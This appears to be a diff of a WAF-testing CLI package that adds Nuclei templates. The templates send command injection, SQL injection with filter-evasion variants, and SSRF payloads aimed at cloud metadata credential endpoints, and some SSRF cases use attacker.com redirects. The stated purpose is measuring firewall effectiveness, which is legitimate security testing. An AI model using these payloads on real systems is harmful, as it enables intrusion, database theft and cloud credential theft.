@waftester/cli 2.8.0

package/templates/nuclei/http/waf-bypass/rce-bypass.yaml

@@ -0,0 +1,171 @@
+id: waf-rce-bypass
+info:
+  name: WAF Remote Code Execution Bypass
+  author: waftester
+  severity: critical
+  description: |
+    Tests WAF effectiveness against command injection and RCE bypass techniques.
+    Covers OS command injection separators, quote insertion, IFS manipulation,
+    brace expansion, wildcard globbing, variable substitution, base64-encoded
+    commands, and evasion techniques effective against major WAF vendors.
+  reference:
+    - https://owasp.org/www-community/attacks/Command_Injection
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
+    - https://github.com/0xInfection/Awesome-WAF
+    - https://portswigger.net/web-security/os-command-injection
+  tags: rce,cmdi,waf,bypass,owasp-a03,injection,waftester
+  classification:
+    cwe-id:
+      - CWE-78
+      - CWE-94
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 24
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Standard command injection separators
+  - method: GET
+    path:
+      - "{{BaseURL}}/?cmd=;cat /etc/passwd"
+      - "{{BaseURL}}/?cmd=|whoami"
+      - "{{BaseURL}}/?cmd=||id"
+      - "{{BaseURL}}/?cmd=&&id"
+      - "{{BaseURL}}/?cmd=;ping+-c+1+127.0.0.1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "root:"
+          - "uid="
+          - "PING"
+        condition: or
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "uid=[0-9]+\\([a-z]+\\)"
+
+  # Quote insertion - break command parsing
+  - method: GET
+    path:
+      - "{{BaseURL}}/?cmd=;c'a't /etc/passwd"
+      - "{{BaseURL}}/?cmd=;c\"a\"t /etc/passwd"
+      - "{{BaseURL}}/?cmd=;w'h'o'a'm'i"
+      - "{{BaseURL}}/?cmd=;w\"h\"o\"a\"m\"i"
+      - "{{BaseURL}}/?cmd=;/b'i'n/c'a't /e't'c/p'a's's'w'd"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # IFS and variable substitution
+  - method: GET
+    path:
+      - "{{BaseURL}}/?cmd=;cat\t/etc/passwd"
+      - "{{BaseURL}}/?cmd=;{cat,/etc/passwd}"
+      - "{{BaseURL}}/?cmd=;cat</etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Wildcard globbing - bypass keyword filters
+  - method: GET
+    path:
+      - "{{BaseURL}}/?cmd=;/???/??t /???/??????"
+      - "{{BaseURL}}/?cmd=;/???/[c]at /???/passwd"
+      - "{{BaseURL}}/?cmd=;/bi?/ca? /et?/passw?"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Backtick and subshell execution
+  - method: GET
+    path:
+      - "{{BaseURL}}/?cmd=`id`"
+      - "{{BaseURL}}/?cmd=`whoami`"
+      - "{{BaseURL}}/?cmd=;echo `cat /etc/passwd`"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Newline and carriage return injection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?cmd=valid%0aid"
+      - "{{BaseURL}}/?cmd=valid%0d%0aid"
+      - "{{BaseURL}}/?cmd=valid%0acat%20/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-bypass/sqli-basic.yaml

@@ -0,0 +1,142 @@
+id: waf-sqli-basic-bypass
+info:
+  name: WAF SQL Injection Basic Bypass
+  author: waftester
+  severity: critical
+  description: |
+    Tests WAF effectiveness against fundamental SQL injection vectors.
+    Covers UNION-based, error-based, boolean blind, time-based blind,
+    and stacked query injection techniques across multiple DBMS targets
+    (MySQL, PostgreSQL, MSSQL, Oracle, SQLite).
+  reference:
+    - https://owasp.org/www-community/attacks/SQL_Injection
+    - https://portswigger.net/web-security/sql-injection
+    - https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
+  tags: sqli,waf,bypass,owasp-a03,injection,waftester
+  classification:
+    cwe-id:
+      - CWE-89
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 20
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Layer 1: UNION-based injection - multiple column counts and DB targets
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' UNION SELECT 1,2,3--"
+      - "{{BaseURL}}/?id=1' UNION SELECT 1,2,3,4,5--"
+      - "{{BaseURL}}/?id=1' UNION ALL SELECT NULL,NULL,NULL--"
+      - "{{BaseURL}}/?id=-1 UNION SELECT table_name,column_name,3 FROM information_schema.columns--"
+      - "{{BaseURL}}/?id=0 UNION SELECT username,password,email FROM users--"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429 && status_code != 503"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "Access Denied"
+          - "blocked"
+          - "Request Rejected"
+          - "not acceptable"
+          - "WAF"
+        negative: true
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "(?i)(mysql|mariadb|postgresql|oracle|mssql|sqlite|sql server)"
+
+  # Layer 2: Error-based injection - extract data through error messages
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' AND extractvalue(1,concat(0x7e,version()))--"
+      - "{{BaseURL}}/?id=1' AND updatexml(1,concat(0x7e,version()),1)--"
+      - "{{BaseURL}}/?id=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--"
+      - "{{BaseURL}}/?id=1 AND 1=CONVERT(int,(SELECT @@version))--"
+      - "{{BaseURL}}/?id=1' AND JSON_KEYS((SELECT CONVERT((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables) USING utf8)))--"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SQL syntax"
+          - "mysql_fetch"
+          - "Warning: mysql"
+          - "Unclosed quotation mark"
+          - "Microsoft OLE DB Provider"
+          - "XPATH syntax error"
+          - "SQLSTATE"
+          - "pg_query"
+          - "ORA-"
+          - "SQLite3::"
+          - "ODBC SQL Server"
+        condition: or
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Layer 3: Boolean blind injection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' AND 1=1-- -"
+      - "{{BaseURL}}/?id=1' AND 1=2-- -"
+      - "{{BaseURL}}/?id=1' OR '1'='1"
+      - "{{BaseURL}}/?id=1' OR ''='"
+      - "{{BaseURL}}/?id=1 AND SUBSTRING(@@version,1,1)=5"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+  # Layer 4: Time-based blind injection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' AND SLEEP(3)-- -"
+      - "{{BaseURL}}/?id=1'; WAITFOR DELAY '0:0:3'--"
+      - "{{BaseURL}}/?id=1' AND BENCHMARK(5000000,SHA1('test'))-- -"
+      - "{{BaseURL}}/?id=1' AND pg_sleep(3)--"
+      - "{{BaseURL}}/?id=1' OR IF(1=1,SLEEP(3),0)-- -"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 503"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml

@@ -0,0 +1,192 @@
+id: waf-sqli-evasion-bypass
+info:
+  name: WAF SQL Injection Evasion Techniques
+  author: waftester
+  severity: critical
+  description: |
+    Tests SQL injection bypass using advanced evasion techniques sourced from
+    real-world WAF bypass research. Includes case alternation, inline MySQL
+    comments, comment insertion, double URL encoding, HPP, null byte injection,
+    alternative whitespace characters, buffer overflow padding, string
+    concatenation, and WAF-vendor-specific bypass techniques.
+  reference:
+    - https://owasp.org/www-community/attacks/SQL_Injection
+    - https://portswigger.net/web-security/sql-injection
+    - https://github.com/0xInfection/Awesome-WAF
+    - https://sqlwiki.netspi.com/
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
+  tags: sqli,waf,bypass,evasion,tamper,waftester
+  classification:
+    cwe-id:
+      - CWE-89
+      - CWE-693
+      - CWE-116
+  metadata:
+    verified: true
+    max-request: 24
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Case alternation - evade simple keyword matching
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' uNiOn SeLeCt 1,2,3--"
+      - "{{BaseURL}}/?id=1' UnIoN aLl sElEcT 1,2,3--"
+      - "{{BaseURL}}/?id=1' uNION sELECT NULL,NULL,NULL--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+  # Inline comment insertion - break keyword signatures
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1'/**/UNION/**/SELECT/**/1,2,3--"
+      - "{{BaseURL}}/?id=1'+un/**/ion+se/**/lect+1,2,3--"
+      - "{{BaseURL}}/?id=1'/**//*!UNION*//**//*!SELECT*//**/1,2,3--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # MySQL versioned comments - only MySQL interprets these
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--"
+      - "{{BaseURL}}/?id=1' /*!UnIoN*/ SeLecT 1,2,3--"
+      - "{{BaseURL}}/?id=1' UNION /*!50000SELECT*/ 1,2,version()--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Double URL encoding
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1%2527%2520OR%25201%253D1--"
+      - "{{BaseURL}}/?id=1%2527%2520UNION%2520SELECT%25201%252C2%252C3--"
+      - "{{BaseURL}}/?id=%252f%252a*/union%252f%252a*/select+1,2,3--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Null byte injection - terminate WAF parsing
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1'%00 OR '1'='1"
+      - "{{BaseURL}}/?id=1'%00 UNION SELECT 1,2,3--"
+      - "{{BaseURL}}/?id=%00' UNION SELECT 1,2,3--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Alternative whitespace characters
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1'%09UNION%09SELECT%091,2,3--"
+      - "{{BaseURL}}/?id=1'%0aUNION%0aSELECT%0a1,2,3--"
+      - "{{BaseURL}}/?id=1'%0bUNION%0bSELECT%0b1,2,3--"
+      - "{{BaseURL}}/?id=1'%0cUNION%0cSELECT%0c1,2,3--"
+      - "{{BaseURL}}/?id=1'%0dUNION%0dSELECT%0d1,2,3--"
+      - "{{BaseURL}}/?id=1'%a0UNION%a0SELECT%a01,2,3--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Alternative functions and string building
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' AND CHAR(115,101,108,101,99,116)--"
+      - "{{BaseURL}}/?id=1' AND lpad('',4,reverse('lave'))--"
+      - "{{BaseURL}}/?id=1' AND lower(conv(11,10,36))--"
+      - "{{BaseURL}}/?id=1' AND CONCAT(CHAR(117),CHAR(110),CHAR(105),CHAR(111),CHAR(110))--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Buffer overflow / long string padding
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=1' AND 1=1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA UNION SELECT 1,2,3--"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml

@@ -0,0 +1,130 @@
+id: waf-ssrf-bypass
+info:
+  name: WAF Server-Side Request Forgery Bypass
+  author: waftester
+  severity: high
+  description: |
+    Tests WAF effectiveness against SSRF bypass techniques targeting cloud
+    metadata endpoints (AWS, GCP, Azure, DigitalOcean), internal services,
+    and localhost. Uses IP encoding tricks (decimal, octal, hex, IPv6),
+    DNS rebinding, URL schema variations, and redirect-based bypasses.
+  reference:
+    - https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
+    - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: ssrf,waf,bypass,owasp-a10,cloud,metadata,waftester
+  classification:
+    cwe-id:
+      - CWE-918
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 22
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Direct cloud metadata access - AWS, GCP, Azure, DigitalOcean
+  - method: GET
+    path:
+      - "{{BaseURL}}/?url=http://169.254.169.254/latest/meta-data/"
+      - "{{BaseURL}}/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+      - "{{BaseURL}}/?url=http://metadata.google.internal/computeMetadata/v1/"
+      - "{{BaseURL}}/?url=http://169.254.169.254/metadata/v1/"
+      - "{{BaseURL}}/?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+      - type: word
+        part: body
+        words:
+          - "ami-id"
+          - "instance-id"
+          - "computeMetadata"
+          - "droplet_id"
+          - "AccessKeyId"
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "(?i)(AKIA[0-9A-Z]{16})"
+          - "(?i)(AccessKeyId.+?\"(.+?)\")"
+
+  # IP encoding bypasses - decimal, octal, hex, IPv6
+  - method: GET
+    path:
+      - "{{BaseURL}}/?url=http://0x7f000001/"
+      - "{{BaseURL}}/?url=http://2130706433/"
+      - "{{BaseURL}}/?url=http://0177.0.0.1/"
+      - "{{BaseURL}}/?url=http://[::1]/"
+      - "{{BaseURL}}/?url=http://127.1/"
+      - "{{BaseURL}}/?url=http://0/"
+      - "{{BaseURL}}/?url=http://0x7f.0x0.0x0.0x1/"
+      - "{{BaseURL}}/?url=http://[::ffff:127.0.0.1]/"
+      - "{{BaseURL}}/?url=http://127.0.0.1.nip.io/"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+  # URL schema tricks and protocol confusion
+  - method: GET
+    path:
+      - "{{BaseURL}}/?url=http://127.0.0.1:80%2523@evil.com/"
+      - "{{BaseURL}}/?url=http://evil.com%23@169.254.169.254/"
+      - "{{BaseURL}}/?url=http://169.254.169.254%252f%252f"
+      - "{{BaseURL}}/?url=dict://127.0.0.1:6379/INFO"
+      - "{{BaseURL}}/?url=gopher://127.0.0.1:6379/_INFO"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Redirect-based SSRF
+  - method: GET
+    path:
+      - "{{BaseURL}}/?url=http://attacker.com/redirect?target=http://169.254.169.254/"
+      - "{{BaseURL}}/?url=http://attacker.com/302?url=http://127.0.0.1/"
+      - "{{BaseURL}}/?next=//169.254.169.254/latest/meta-data/"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or